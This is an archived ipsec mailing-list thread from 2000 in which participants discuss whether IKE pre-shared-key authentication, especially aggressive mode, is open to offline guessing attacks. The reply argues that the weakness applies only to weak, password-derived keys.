[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Safety of pre-shared keys? (Re: Reliable delete notifies)



Note that the vulnerabilities of pre-shared key that you refer to
only apply to the case of a WEAK KEY (such as a password-derived key).
It says nothing about the security of the pre-shared mode (main
or agressive) when using a strong key.
In such a case there is no security problem!
(There is always a security problem if you do not choose your keys
correctly or you do not know how to manage them securely).

In any case preshared mode (main or aggressive) was NOT designed to be
used with passwords. A password-based protocol needs a specialized design
(either a new mode for IKE or the proposals of ipsra).

Hugo

On Tue, 24 Oct 2000, Ari Huttunen wrote:

> Thanks, I think it helps. I really didn't have sufficient time to read it,
> but here's how I understood it:
> 
> Aggressive mode is vulnerable to off-line attacks against the pre-shared
> key because HASH_I contains enough information about it, and it's transmitted
> unencrypted. Main mode has no such vulnerability because HASH_I is transmitted
> encrypted.
> 
> So, informed GUESSING would produce the additional results:
> - Aggressive mode with 3rd msg. encrypted is still vulnerable since the same
>   information can probably be obtained from HASH_R.
> - Base mode has a similar vulnerability.
> 
> Ari
> 
> William Dixon wrote:
> > 
> > Ari, does John Pliam's paper answer your question on "what would it take
> > to fool authentication based on pre-shared keys" ?
> > 
> > http://www.ima.umn.edu/~pliam/xauth/
> > 
> > -----Original Message-----
> > From: Ari Huttunen [mailto:Ari.Huttunen@F-Secure.com]
> > Sent: Saturday, October 21, 2000 5:02 PM
> > To: Henry Spencer
> > Cc: Jan Vilhuber; ipsec
> > Subject: Safety of pre-shared keys? (Re: Reliable delete notifies)
> > 
> > Henry Spencer wrote:
> > >
> > > On Mon, 9 Oct 2000, Jan Vilhuber wrote:
> > > > With pure public keys, you need TWO of them. Granted, I can
> > provision every
> > > > box with the same private key, which would make it equivalent to the
> > above
> > > > group-pre-shared key scenarion. But in reality you need two public
> > keys,
> > > > where before you had a single pre-shared key.
> > >
> > > Consider them two halves of the same shared secret.  There's no
> > fundamental
> > > difference...
> > 
> > Incorrect. With a pre-shared key you have one key that is secret. With
> > public
> > keys, you have two keys, one of which is public, one is secret. I'm
> > quite
> > sure everyone on this list knows this much..
> > 
> > Now, if you have that public key, you CAN give it to some mechanical
> > calculator
> > for cracking. Eventually that machine will produce a result, and if it's
> > based
> > on quantum computing you might actually get a result before the Big
> > Crash (if any).
> > 
> > Out of curiosity, what would one need to fool authentication based on
> > pre-shared keys, assuming only knowledge of things-on-the-wire? Would
> > the
> > method learn the value of the pre-shared key or something else? (Would
> > it
> > be safe against quantum computers?)
> > 
> > Ari
> > 
> > --
> > Ari Huttunen                   phone: +358 9 859 900
> > Senior Software Engineer       fax  : +358 9 8599 0452
> > 
> > F-Secure Corporation       http://www.F-Secure.com
> > 
> > F-Secure products: Integrated Solutions for Enterprise Security
> 
> -- 
> Ari Huttunen                   phone: +358 9 859 900
> Senior Software Engineer       fax  : +358 9 8599 0452
> 
> F-Secure Corporation       http://www.F-Secure.com 
> 
> F-Secure products: Integrated Solutions for Enterprise Security
> 



References: